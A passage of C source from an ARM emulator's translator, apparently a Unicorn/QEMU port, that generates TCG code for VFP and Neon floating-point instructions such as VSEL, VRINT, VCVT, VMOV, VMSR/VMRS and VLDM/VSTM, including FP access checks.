0x8000 : 0) | (extract32(imm8, 6, 1) ?
0x3e00 : 0x4000) | (extract32(imm8, 0, 6) << 3); imm <<= 16; break; case MO_16: imm = (extract32(imm8, 7, 1) ? 0x8000 : 0) | (extract32(imm8, 6, 1) ? 0x3000 : 0x4000) | (extract32(imm8, 0, 6) << 6); break; default: g_assert_not_reached(); } return imm; } /* * Return the offset of a 16-bit half of the specified VFP single-precision * register. If top is true, returns the top 16 bits; otherwise the bottom * 16 bits. */ static inline long vfp_f16_offset(unsigned reg, bool top) { long offs = vfp_reg_offset(false, reg); #ifdef HOST_WORDS_BIGENDIAN if (!top) { offs += 2; } #else if (top) { offs += 2; } #endif return offs; } /* * Check that VFP access is enabled. If it is, do the necessary * M-profile lazy-FP handling and then return true. * If not, emit code to generate an appropriate exception and * return false. * The ignore_vfp_enabled argument specifies that we should ignore * whether VFP is enabled via FPEXC[EN]: this should be true for FMXR/FMRX * accesses to FPSID, FPEXC, MVFR0, MVFR1, MVFR2, and false for all other insns. */ static bool full_vfp_access_check(DisasContext *s, bool ignore_vfp_enabled) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->fp_excp_el) { if (arm_dc_feature(s, ARM_FEATURE_M)) { gen_exception_insn(s, s->pc_curr, EXCP_NOCP, syn_uncategorized(), s->fp_excp_el); } else { gen_exception_insn(s, s->pc_curr, EXCP_UDEF, syn_fp_access_trap(1, 0xe, false), s->fp_excp_el); } return false; } if (!s->vfp_enabled && !ignore_vfp_enabled) { assert(!arm_dc_feature(s, ARM_FEATURE_M)); unallocated_encoding(s); return false; } if (arm_dc_feature(s, ARM_FEATURE_M)) { /* Handle M-profile lazy FP state mechanics */ /* Trigger lazy-state preservation if necessary */ if (s->v7m_lspact) { /* * Lazy state saving affects external memory and also the NVIC, * so we must mark it as an IO operation for icount. */ if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_v7m_preserve_fp_state(tcg_ctx, tcg_ctx->cpu_env); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); } /* * If the preserve_fp_state helper doesn't throw an exception * then it will clear LSPACT; we don't need to repeat this for * any further FP insns in this TB. */ s->v7m_lspact = false; } /* Update ownership of FP context: set FPCCR.S to match current state */ if (s->v8m_fpccr_s_wrong) { TCGv_i32 tmp; tmp = load_cpu_field(tcg_ctx, v7m.fpccr[M_REG_S]); if (s->v8m_secure) { tcg_gen_ori_i32(tcg_ctx, tmp, tmp, R_V7M_FPCCR_S_MASK); } else { tcg_gen_andi_i32(tcg_ctx, tmp, tmp, ~R_V7M_FPCCR_S_MASK); } store_cpu_field(tcg_ctx, tmp, v7m.fpccr[M_REG_S]); /* Don't need to do this for any further FP insns in this TB */ s->v8m_fpccr_s_wrong = false; } if (s->v7m_new_fp_ctxt_needed) { /* * Create new FP context by updating CONTROL.FPCA, CONTROL.SFPA * and the FPSCR. */ TCGv_i32 control, fpscr; uint32_t bits = R_V7M_CONTROL_FPCA_MASK; fpscr = load_cpu_field(tcg_ctx, v7m.fpdscr[s->v8m_secure]); gen_helper_vfp_set_fpscr(tcg_ctx, tcg_ctx->cpu_env, fpscr); tcg_temp_free_i32(tcg_ctx, fpscr); /* * We don't need to arrange to end the TB, because the only * parts of FPSCR which we cache in the TB flags are the VECLEN * and VECSTRIDE, and those don't exist for M-profile. 
*/ if (s->v8m_secure) { bits |= R_V7M_CONTROL_SFPA_MASK; } control = load_cpu_field(tcg_ctx, v7m.control[M_REG_S]); tcg_gen_ori_i32(tcg_ctx, control, control, bits); store_cpu_field(tcg_ctx, control, v7m.control[M_REG_S]); /* Don't need to do this for any further FP insns in this TB */ s->v7m_new_fp_ctxt_needed = false; } } return true; } /* * The most usual kind of VFP access check, for everything except * FMXR/FMRX to the always-available special registers. */ static bool vfp_access_check(DisasContext *s) { return full_vfp_access_check(s, false); } static bool trans_VSEL(DisasContext *s, arg_VSEL *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t rd, rn, rm; bool dp = a->dp; if (!dc_isar_feature(aa32_vsel, s)) { return false; } if (dp && !dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (dp && !dc_isar_feature(aa32_simd_r32, s) && ((a->vm | a->vn | a->vd) & 0x10)) { return false; } rd = a->vd; rn = a->vn; rm = a->vm; if (!vfp_access_check(s)) { return true; } if (dp) { TCGv_i64 frn, frm, dest; TCGv_i64 tmp, zero, zf, nf, vf; zero = tcg_const_i64(tcg_ctx, 0); frn = tcg_temp_new_i64(tcg_ctx); frm = tcg_temp_new_i64(tcg_ctx); dest = tcg_temp_new_i64(tcg_ctx); zf = tcg_temp_new_i64(tcg_ctx); nf = tcg_temp_new_i64(tcg_ctx); vf = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, zf, tcg_ctx->cpu_ZF); tcg_gen_ext_i32_i64(tcg_ctx, nf, tcg_ctx->cpu_NF); tcg_gen_ext_i32_i64(tcg_ctx, vf, tcg_ctx->cpu_VF); neon_load_reg64(tcg_ctx, frn, rn); neon_load_reg64(tcg_ctx, frm, rm); switch (a->cc) { case 0: /* eq: Z */ tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, dest, zf, zero, frn, frm); break; case 1: /* vs: V */ tcg_gen_movcond_i64(tcg_ctx, TCG_COND_LT, dest, vf, zero, frn, frm); break; case 2: /* ge: N == V -> N ^ V == 0 */ tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_xor_i64(tcg_ctx, tmp, vf, nf); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, dest, tmp, zero, frn, frm); tcg_temp_free_i64(tcg_ctx, tmp); break; case 3: /* gt: !Z && N == V */ tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, dest, zf, zero, frn, frm); tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_xor_i64(tcg_ctx, tmp, vf, nf); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_GE, dest, tmp, zero, dest, frm); tcg_temp_free_i64(tcg_ctx, tmp); break; } neon_store_reg64(tcg_ctx, dest, rd); tcg_temp_free_i64(tcg_ctx, frn); tcg_temp_free_i64(tcg_ctx, frm); tcg_temp_free_i64(tcg_ctx, dest); // qq tcg_temp_free_i64(tcg_ctx, zf); tcg_temp_free_i64(tcg_ctx, nf); tcg_temp_free_i64(tcg_ctx, vf); tcg_temp_free_i64(tcg_ctx, zero); } else { TCGv_i32 frn, frm, dest; TCGv_i32 tmp, zero; zero = tcg_const_i32(tcg_ctx, 0); frn = tcg_temp_new_i32(tcg_ctx); frm = tcg_temp_new_i32(tcg_ctx); dest = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, frn, rn); neon_load_reg32(tcg_ctx, frm, rm); switch (a->cc) { case 0: /* eq: Z */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, dest, tcg_ctx->cpu_ZF, zero, frn, frm); break; case 1: /* vs: V */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LT, dest, tcg_ctx->cpu_VF, zero, frn, frm); break; case 2: /* ge: N == V -> N ^ V == 0 */ tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GE, dest, tmp, zero, frn, frm); tcg_temp_free_i32(tcg_ctx, tmp); break; case 3: /* gt: !Z && N == V */ tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, dest, tcg_ctx->cpu_ZF, zero, frn, frm); tmp = tcg_temp_new_i32(tcg_ctx); tcg_gen_xor_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, tcg_ctx->cpu_NF); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GE, dest, tmp, zero, 
dest, frm); tcg_temp_free_i32(tcg_ctx, tmp); break; } neon_store_reg32(tcg_ctx, dest, rd); tcg_temp_free_i32(tcg_ctx, frn); tcg_temp_free_i32(tcg_ctx, frm); tcg_temp_free_i32(tcg_ctx, dest); tcg_temp_free_i32(tcg_ctx, zero); } return true; } /* * Table for converting the most common AArch32 encoding of * rounding mode to arm_fprounding order (which matches the * common AArch64 order); see ARM ARM pseudocode FPDecodeRM(). */ static const uint8_t fp_decode_rm[] = { FPROUNDING_TIEAWAY, FPROUNDING_TIEEVEN, FPROUNDING_POSINF, FPROUNDING_NEGINF, }; static bool trans_VRINT(DisasContext *s, arg_VRINT *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t rd, rm; bool dp = a->dp; TCGv_ptr fpst; TCGv_i32 tcg_rmode; int rounding = fp_decode_rm[a->rm]; if (!dc_isar_feature(aa32_vrint, s)) { return false; } if (dp && !dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (dp && !dc_isar_feature(aa32_simd_r32, s) && ((a->vm | a->vd) & 0x10)) { return false; } rd = a->vd; rm = a->vm; if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, 0); tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rounding)); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); if (dp) { TCGv_i64 tcg_op; TCGv_i64 tcg_res; tcg_op = tcg_temp_new_i64(tcg_ctx); tcg_res = tcg_temp_new_i64(tcg_ctx); neon_load_reg64(tcg_ctx, tcg_op, rm); gen_helper_rintd(tcg_ctx, tcg_res, tcg_op, fpst); neon_store_reg64(tcg_ctx, tcg_res, rd); tcg_temp_free_i64(tcg_ctx, tcg_op); tcg_temp_free_i64(tcg_ctx, tcg_res); } else { TCGv_i32 tcg_op; TCGv_i32 tcg_res; tcg_op = tcg_temp_new_i32(tcg_ctx); tcg_res = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tcg_op, rm); gen_helper_rints(tcg_ctx, tcg_res, tcg_op, fpst); neon_store_reg32(tcg_ctx, tcg_res, rd); tcg_temp_free_i32(tcg_ctx, tcg_op); tcg_temp_free_i32(tcg_ctx, tcg_res); } gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VCVT(DisasContext *s, arg_VCVT *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t rd, rm; bool dp = a->dp; TCGv_ptr fpst; TCGv_i32 tcg_rmode, tcg_shift; int rounding = fp_decode_rm[a->rm]; bool is_signed = a->op; if (!dc_isar_feature(aa32_vcvt_dr, s)) { return false; } if (dp && !dc_isar_feature(aa32_fpdp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (dp && !dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } rd = a->vd; rm = a->vm; if (!vfp_access_check(s)) { return true; } fpst = get_fpstatus_ptr(tcg_ctx, 0); tcg_shift = tcg_const_i32(tcg_ctx, 0); tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rounding)); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); if (dp) { TCGv_i64 tcg_double, tcg_res; TCGv_i32 tcg_tmp; tcg_double = tcg_temp_new_i64(tcg_ctx); tcg_res = tcg_temp_new_i64(tcg_ctx); tcg_tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg64(tcg_ctx, tcg_double, rm); if (is_signed) { gen_helper_vfp_tosld(tcg_ctx, tcg_res, tcg_double, tcg_shift, fpst); } else { gen_helper_vfp_tould(tcg_ctx, tcg_res, tcg_double, tcg_shift, fpst); } tcg_gen_extrl_i64_i32(tcg_ctx, tcg_tmp, tcg_res); neon_store_reg32(tcg_ctx, tcg_tmp, rd); tcg_temp_free_i32(tcg_ctx, tcg_tmp); tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_double); } else { TCGv_i32 tcg_single, tcg_res; tcg_single = tcg_temp_new_i32(tcg_ctx); tcg_res = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tcg_single, rm); if (is_signed) { 
gen_helper_vfp_tosls(tcg_ctx, tcg_res, tcg_single, tcg_shift, fpst); } else { gen_helper_vfp_touls(tcg_ctx, tcg_res, tcg_single, tcg_shift, fpst); } neon_store_reg32(tcg_ctx, tcg_res, rd); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_single); } gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); tcg_temp_free_i32(tcg_ctx, tcg_shift); tcg_temp_free_ptr(tcg_ctx, fpst); return true; } static bool trans_VMOV_to_gp(DisasContext *s, arg_VMOV_to_gp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* VMOV scalar to general purpose register */ TCGv_i32 tmp; int pass; uint32_t offset; /* SIZE == 2 is a VFP instruction; otherwise NEON. */ if (a->size == 2 ? !dc_isar_feature(aa32_fpsp_v2, s) : !arm_dc_feature(s, ARM_FEATURE_NEON)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vn & 0x10)) { return false; } offset = a->index << a->size; pass = extract32(offset, 2, 1); offset = extract32(offset, 0, 2) * 8; if (!vfp_access_check(s)) { return true; } tmp = neon_load_reg(tcg_ctx, a->vn, pass); switch (a->size) { case 0: if (offset) { tcg_gen_shri_i32(tcg_ctx, tmp, tmp, offset); } if (a->u) { gen_uxtb(tmp); } else { gen_sxtb(tmp); } break; case 1: if (a->u) { if (offset) { tcg_gen_shri_i32(tcg_ctx, tmp, tmp, 16); } else { gen_uxth(tmp); } } else { if (offset) { tcg_gen_sari_i32(tcg_ctx, tmp, tmp, 16); } else { gen_sxth(tmp); } } break; case 2: break; } store_reg(s, a->rt, tmp); return true; } static bool trans_VMOV_from_gp(DisasContext *s, arg_VMOV_from_gp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* VMOV general purpose register to scalar */ TCGv_i32 tmp, tmp2; int pass; uint32_t offset; /* SIZE == 2 is a VFP instruction; otherwise NEON. */ if (a->size == 2 ? !dc_isar_feature(aa32_fpsp_v2, s) : !arm_dc_feature(s, ARM_FEATURE_NEON)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vn & 0x10)) { return false; } offset = a->index << a->size; pass = extract32(offset, 2, 1); offset = extract32(offset, 0, 2) * 8; if (!vfp_access_check(s)) { return true; } tmp = load_reg(s, a->rt); switch (a->size) { case 0: tmp2 = neon_load_reg(tcg_ctx, a->vn, pass); tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, offset, 8); tcg_temp_free_i32(tcg_ctx, tmp2); break; case 1: tmp2 = neon_load_reg(tcg_ctx, a->vn, pass); tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, offset, 16); tcg_temp_free_i32(tcg_ctx, tmp2); break; case 2: break; } neon_store_reg(tcg_ctx, a->vn, pass, tmp); return true; } static bool trans_VDUP(DisasContext *s, arg_VDUP *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* VDUP (general purpose register) */ TCGv_i32 tmp; int size, vec_size; if (!arm_dc_feature(s, ARM_FEATURE_NEON)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vn & 0x10)) { return false; } if (a->b && a->e) { return false; } if (a->q && (a->vn & 1)) { return false; } vec_size = a->q ? 
16 : 8; if (a->b) { size = 0; } else if (a->e) { size = 1; } else { size = 2; } if (!vfp_access_check(s)) { return true; } tmp = load_reg(s, a->rt); tcg_gen_gvec_dup_i32(tcg_ctx, size, neon_reg_offset(a->vn, 0), vec_size, vec_size, tmp); tcg_temp_free_i32(tcg_ctx, tmp); return true; } static bool trans_VMSR_VMRS(DisasContext *s, arg_VMSR_VMRS *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp = 0; bool ignore_vfp_enabled = false; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (arm_dc_feature(s, ARM_FEATURE_M)) { /* * The only M-profile VFP vmrs/vmsr sysreg is FPSCR. * Accesses to R15 are UNPREDICTABLE; we choose to undef. * (FPSCR -> r15 is a special case which writes to the PSR flags.) */ if (a->rt == 15 && (!a->l || a->reg != ARM_VFP_FPSCR)) { return false; } } switch (a->reg) { case ARM_VFP_FPSID: /* * VFPv2 allows access to FPSID from userspace; VFPv3 restricts * all ID registers to privileged access only. */ if (IS_USER(s) && dc_isar_feature(aa32_fpsp_v3, s)) { return false; } ignore_vfp_enabled = true; break; case ARM_VFP_MVFR0: case ARM_VFP_MVFR1: if (IS_USER(s) || !arm_dc_feature(s, ARM_FEATURE_MVFR)) { return false; } ignore_vfp_enabled = true; break; case ARM_VFP_MVFR2: if (IS_USER(s) || !arm_dc_feature(s, ARM_FEATURE_V8)) { return false; } ignore_vfp_enabled = true; break; case ARM_VFP_FPSCR: break; case ARM_VFP_FPEXC: if (IS_USER(s)) { return false; } ignore_vfp_enabled = true; break; case ARM_VFP_FPINST: case ARM_VFP_FPINST2: /* Not present in VFPv3 */ if (IS_USER(s) || dc_isar_feature(aa32_fpsp_v3, s)) { return false; } break; default: return false; } if (!full_vfp_access_check(s, ignore_vfp_enabled)) { return true; } if (a->l) { /* VMRS, move VFP special register to gp register */ switch (a->reg) { case ARM_VFP_MVFR0: case ARM_VFP_MVFR1: case ARM_VFP_MVFR2: case ARM_VFP_FPSID: if (s->current_el == 1) { TCGv_i32 tcg_reg, tcg_rt; gen_set_condexec(s); gen_set_pc_im(s, s->pc_curr); tcg_reg = tcg_const_i32(tcg_ctx, a->reg); tcg_rt = tcg_const_i32(tcg_ctx, a->rt); gen_helper_check_hcr_el2_trap(tcg_ctx, tcg_ctx->cpu_env, tcg_rt, tcg_reg); tcg_temp_free_i32(tcg_ctx, tcg_reg); tcg_temp_free_i32(tcg_ctx, tcg_rt); } /* fall through */ case ARM_VFP_FPEXC: case ARM_VFP_FPINST: case ARM_VFP_FPINST2: tmp = load_cpu_field(tcg_ctx, vfp.xregs[a->reg]); break; case ARM_VFP_FPSCR: if (a->rt == 15) { tmp = load_cpu_field(tcg_ctx, vfp.xregs[ARM_VFP_FPSCR]); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 0xf0000000); } else { tmp = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_get_fpscr(tcg_ctx, tmp, tcg_ctx->cpu_env); } break; default: g_assert_not_reached(); } if (a->rt == 15) { /* Set the 4 flag bits in the CPSR. */ gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp); } else { store_reg(s, a->rt, tmp); } } else { /* VMSR, move gp register to VFP special register */ switch (a->reg) { case ARM_VFP_FPSID: case ARM_VFP_MVFR0: case ARM_VFP_MVFR1: case ARM_VFP_MVFR2: /* Writes are ignored. */ break; case ARM_VFP_FPSCR: tmp = load_reg(s, a->rt); gen_helper_vfp_set_fpscr(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_lookup_tb(s); break; case ARM_VFP_FPEXC: /* * TODO: VFP subarchitecture support. 
* For now, keep the EN bit only */ tmp = load_reg(s, a->rt); tcg_gen_andi_i32(tcg_ctx, tmp, tmp, 1 << 30); store_cpu_field(tcg_ctx, tmp, vfp.xregs[a->reg]); gen_lookup_tb(s); break; case ARM_VFP_FPINST: case ARM_VFP_FPINST2: tmp = load_reg(s, a->rt); store_cpu_field(tcg_ctx, tmp, vfp.xregs[a->reg]); break; default: g_assert_not_reached(); } } return true; } static bool trans_VMOV_single(DisasContext *s, arg_VMOV_single *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!vfp_access_check(s)) { return true; } if (a->l) { /* VFP to general purpose register */ tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vn); if (a->rt == 15) { /* Set the 4 flag bits in the CPSR. */ gen_set_nzcv(tmp); tcg_temp_free_i32(tcg_ctx, tmp); } else { store_reg(s, a->rt, tmp); } } else { /* general purpose register to VFP */ tmp = load_reg(s, a->rt); neon_store_reg32(tcg_ctx, tmp, a->vn); tcg_temp_free_i32(tcg_ctx, tmp); } return true; } static bool trans_VMOV_64_sp(DisasContext *s, arg_VMOV_64_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } /* * VMOV between two general-purpose registers and two single precision * floating point registers */ if (!vfp_access_check(s)) { return true; } if (a->op) { /* fpreg to gpreg */ tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm); store_reg(s, a->rt, tmp); tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm + 1); store_reg(s, a->rt2, tmp); } else { /* gpreg to fpreg */ tmp = load_reg(s, a->rt); neon_store_reg32(tcg_ctx, tmp, a->vm); tcg_temp_free_i32(tcg_ctx, tmp); tmp = load_reg(s, a->rt2); neon_store_reg32(tcg_ctx, tmp, a->vm + 1); tcg_temp_free_i32(tcg_ctx, tmp); } return true; } static bool trans_VMOV_64_dp(DisasContext *s, arg_VMOV_64_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tmp; /* * VMOV between two general-purpose registers and one double precision * floating point register. Note that this does not require support * for double precision arithmetic. */ if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vm & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } if (a->op) { /* fpreg to gpreg */ tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm * 2); store_reg(s, a->rt, tmp); tmp = tcg_temp_new_i32(tcg_ctx); neon_load_reg32(tcg_ctx, tmp, a->vm * 2 + 1); store_reg(s, a->rt2, tmp); } else { /* gpreg to fpreg */ tmp = load_reg(s, a->rt); neon_store_reg32(tcg_ctx, tmp, a->vm * 2); tcg_temp_free_i32(tcg_ctx, tmp); tmp = load_reg(s, a->rt2); neon_store_reg32(tcg_ctx, tmp, a->vm * 2 + 1); tcg_temp_free_i32(tcg_ctx, tmp); } return true; } static bool trans_VLDR_VSTR_sp(DisasContext *s, arg_VLDR_VSTR_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; TCGv_i32 addr, tmp; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } if (!vfp_access_check(s)) { return true; } offset = a->imm << 2; if (!a->u) { #ifdef _MSC_VER offset = 0 - offset; #else offset = -offset; #endif } /* For thumb, use of PC is UNPREDICTABLE. 
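 * We use add_reg_for_lit() below, which handles the rn == 15 case by
 * reading the word-aligned PC for literal accesses, so the effective
 * address is rn +/- (imm << 2).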
*/ addr = add_reg_for_lit(s, a->rn, offset); tmp = tcg_temp_new_i32(tcg_ctx); if (a->l) { gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); neon_store_reg32(tcg_ctx, tmp, a->vd); } else { neon_load_reg32(tcg_ctx, tmp, a->vd); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); } tcg_temp_free_i32(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, addr); return true; } static bool trans_VLDR_VSTR_dp(DisasContext *s, arg_VLDR_VSTR_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; TCGv_i32 addr; TCGv_i64 tmp; /* Note that this does not require support for double arithmetic. */ if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd & 0x10)) { return false; } if (!vfp_access_check(s)) { return true; } offset = a->imm << 2; if (!a->u) { #ifdef _MSC_VER offset = 0 - offset; #else offset = -offset; #endif } /* For thumb, use of PC is UNPREDICTABLE. */ addr = add_reg_for_lit(s, a->rn, offset); tmp = tcg_temp_new_i64(tcg_ctx); if (a->l) { gen_aa32_ld64(s, tmp, addr, get_mem_index(s)); neon_store_reg64(tcg_ctx, tmp, a->vd); } else { neon_load_reg64(tcg_ctx, tmp, a->vd); gen_aa32_st64(s, tmp, addr, get_mem_index(s)); } tcg_temp_free_i64(tcg_ctx, tmp); tcg_temp_free_i32(tcg_ctx, addr); return true; } static bool trans_VLDM_VSTM_sp(DisasContext *s, arg_VLDM_VSTM_sp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; TCGv_i32 addr, tmp; int i, n; if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } n = a->imm; if (n == 0 || (a->vd + n) > 32) { /* * UNPREDICTABLE cases for bad immediates: we choose to * UNDEF to avoid generating huge numbers of TCG ops */ return false; } if (a->rn == 15 && a->w) { /* writeback to PC is UNPREDICTABLE, we choose to UNDEF */ return false; } if (!vfp_access_check(s)) { return true; } /* For thumb, use of PC is UNPREDICTABLE. */ addr = add_reg_for_lit(s, a->rn, 0); if (a->p) { /* pre-decrement */ tcg_gen_addi_i32(tcg_ctx, addr, addr, -(a->imm << 2)); } if (s->v8m_stackcheck && a->rn == 13 && a->w) { /* * Here 'addr' is the lowest address we will store to, * and is either the old SP (if post-increment) or * the new SP (if pre-decrement). For post-increment * where the old value is below the limit and the new * value is above, it is UNKNOWN whether the limit check * triggers; we choose to trigger. */ gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, addr); } offset = 4; tmp = tcg_temp_new_i32(tcg_ctx); for (i = 0; i < n; i++) { if (a->l) { /* load */ gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); neon_store_reg32(tcg_ctx, tmp, a->vd + i); } else { /* store */ neon_load_reg32(tcg_ctx, tmp, a->vd + i); gen_aa32_st32(s, tmp, addr, get_mem_index(s)); } tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); } tcg_temp_free_i32(tcg_ctx, tmp); if (a->w) { /* writeback */ if (a->p) { #ifdef _MSC_VER offset = (0 - offset) * n; #else offset = -offset * n; #endif tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); } store_reg(s, a->rn, addr); } else { tcg_temp_free_i32(tcg_ctx, addr); } return true; } static bool trans_VLDM_VSTM_dp(DisasContext *s, arg_VLDM_VSTM_dp *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint32_t offset; TCGv_i32 addr; TCGv_i64 tmp; int i, n; /* Note that this does not require support for double arithmetic. 
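 * The immediate is twice the number of doubleword registers to
 * transfer; an odd value selects the deprecated FLDMX/FSTMX form,
 * which moves the same registers but adjusts the final writeback
 * address by an extra word (see the a->imm & 1 case below).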
*/ if (!dc_isar_feature(aa32_fpsp_v2, s)) { return false; } n = a->imm >> 1; if (n == 0 || (a->vd + n) > 32 || n > 16) { /* * UNPREDICTABLE cases for bad immediates: we choose to * UNDEF to avoid generating huge numbers of TCG ops */ return false; } if (a->rn == 15 && a->w) { /* writeback to PC is UNPREDICTABLE, we choose to UNDEF */ return false; } /* UNDEF accesses to D16-D31 if they don't exist */ if (!dc_isar_feature(aa32_simd_r32, s) && (a->vd + n) > 16) { return false; } if (!vfp_access_check(s)) { return true; } /* For thumb, use of PC is UNPREDICTABLE. */ addr = add_reg_for_lit(s, a->rn, 0); if (a->p) { /* pre-decrement */ tcg_gen_addi_i32(tcg_ctx, addr, addr, -(a->imm << 2)); } if (s->v8m_stackcheck && a->rn == 13 && a->w) { /* * Here 'addr' is the lowest address we will store to, * and is either the old SP (if post-increment) or * the new SP (if pre-decrement). For post-increment * where the old value is below the limit and the new * value is above, it is UNKNOWN whether the limit check * triggers; we choose to trigger. */ gen_helper_v8m_stackcheck(tcg_ctx, tcg_ctx->cpu_env, addr); } offset = 8; tmp = tcg_temp_new_i64(tcg_ctx); for (i = 0; i < n; i++) { if (a->l) { /* load */ gen_aa32_ld64(s, tmp, addr, get_mem_index(s)); neon_store_reg64(tcg_ctx, tmp, a->vd + i); } else { /* store */ neon_load_reg64(tcg_ctx, tmp, a->vd + i); gen_aa32_st64(s, tmp, addr, get_mem_index(s)); } tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); } tcg_temp_free_i64(tcg_ctx, tmp); if (a->w) { /* writeback */ if (a->p) { #ifdef _MSC_VER offset = (0 - offset) * n; #else offset = -offset * n; #endif } else if (a->imm & 1) { offset = 4; } else { offset = 0; } if (offset != 0) { tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); } store_reg(s, a->rn, addr); } else { tcg_temp_free_i32(tcg_ctx, addr); } return true; } /* * Types for callbacks for do_vfp_3op_sp() and do_vfp_3op_dp(). * The callback should emit code to write a value to vd. If * do_vfp_3op_{sp,dp}() was passed reads_vd then the TCGv vd * will contain the old value of the relevant VFP register; * otherwise it must be written to only. */ typedef void VFPGen3OpSPFn(TCGContext *, TCGv_i32 vd, TCGv_i32 vn, TCGv_i32 vm, TCGv_ptr fpst); typedef void VFPGen3OpDPFn(TCGContext *, TCGv_i64 vd, TCGv_i64 vn, TCGv_i64 vm, TCGv_ptr fpst); /* * Types for callbacks for do_vfp_2op_sp() and do_vfp_2op_dp(). * The callback should emit code to write a value to vd (which * should be written to only). */ typedef void VFPGen2OpSPFn(TCGContext *, TCGv_i32 vd, 